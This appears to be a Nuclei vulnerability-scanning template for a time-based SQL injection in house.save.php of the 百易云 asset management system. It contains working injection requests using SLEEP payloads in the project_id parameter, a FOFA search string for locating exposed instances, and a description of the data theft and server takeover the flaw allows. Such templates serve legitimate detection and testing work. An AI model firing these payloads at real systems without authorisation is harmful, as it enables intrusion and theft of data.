id: baiyiyun-house_save_php-sql

info:
  name: 百易云资产管理运营系统 house.save.php SQL延时注入漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: body="不要着急，点此"
    百易云资产管理运营系统 house.save.php 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247487436&idx=1&sn=548f698533c1f2631524dd87cedc8a22&chksm=c267bafff51033e949efc22ef9a1f214413e76597188bee9c467b135a2880f7d5bf791a7ed83&token=286085064&lang=zh_CN#rd
  tags: sql injection


http:
  - raw:
      - |
        GET /adminx/house.save.php?project_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(4)))OKTO) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
      - |
        GET /adminx/house.save.php?project_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(8)))OKTO) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and



